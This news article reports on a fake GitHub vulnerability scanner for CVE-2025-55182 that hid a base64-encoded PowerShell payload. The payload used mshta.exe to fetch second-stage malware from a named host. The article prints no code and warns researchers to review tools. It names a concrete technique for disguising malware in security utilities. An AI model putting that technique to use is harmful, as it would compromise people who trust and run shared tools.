A GitHub repository posing as a vulnerability scanner for CVE-2025-55182, also referred to as “React2Shell,” was exposed as malicious after spreading malware. The project, named React2shell-scanner, was hosted under the user niha0wa and has since been removed from the platform following community reports.
Saurabh, a cybersecurity researcher, flagged the now-deleted tool on LinkedIn last week after identifying suspicious behaviour in the code. According to his post, the script included a hidden payload designed to execute mshta.exe and fetch a remote file from py-installer.cc, a known technique used to drop second-stage malware.
Looking at the script confirms the warning. The malware was embedded within react2shellpy.py, where a section of base64-encoded strings was decoded into a PowerShell command.
The malware targeted Windows devices by using mshta.exe, a legitimate Windows tool often abused to run malicious scripts, pointing to a malicious custom script hosted on GitHub. The script appeared to execute without prompting the user or raising suspicion.
The scanner was aimed at security professionals investigating CVE-2025-55182, presented as something helpful rather than harmful. By posing as a legitimate security utility, it turned normal research activity into an entry point for compromise, putting cybersecurity researchers at risk.
It is worth noting that this came just days after reports showed hackers hiding new PyStoreRAT malware inside utility tools on GitHub, specifically targeting OSINT and cybersecurity researchers.
While GitHub acted quickly and removed the repository, the incident goes on to show that code shared under the banner of cybersecurity tools needs to be reviewed with caution. Simply put, no tool should be trusted blindly just because it’s hosted on a familiar platform.
Saurabh’s full warning can be found here. He urged security professionals to review source code thoroughly before executing any third-party tools, especially those claiming to assist in vulnerability detection.
While the malicious script has been taken down, cached copies or forks may still circulate. Researchers analysing CVE-2025-55182 or similar high-interest vulnerabilities should stay alert for fake exploit tools, especially those with obfuscated code, network callbacks or unclear authorship.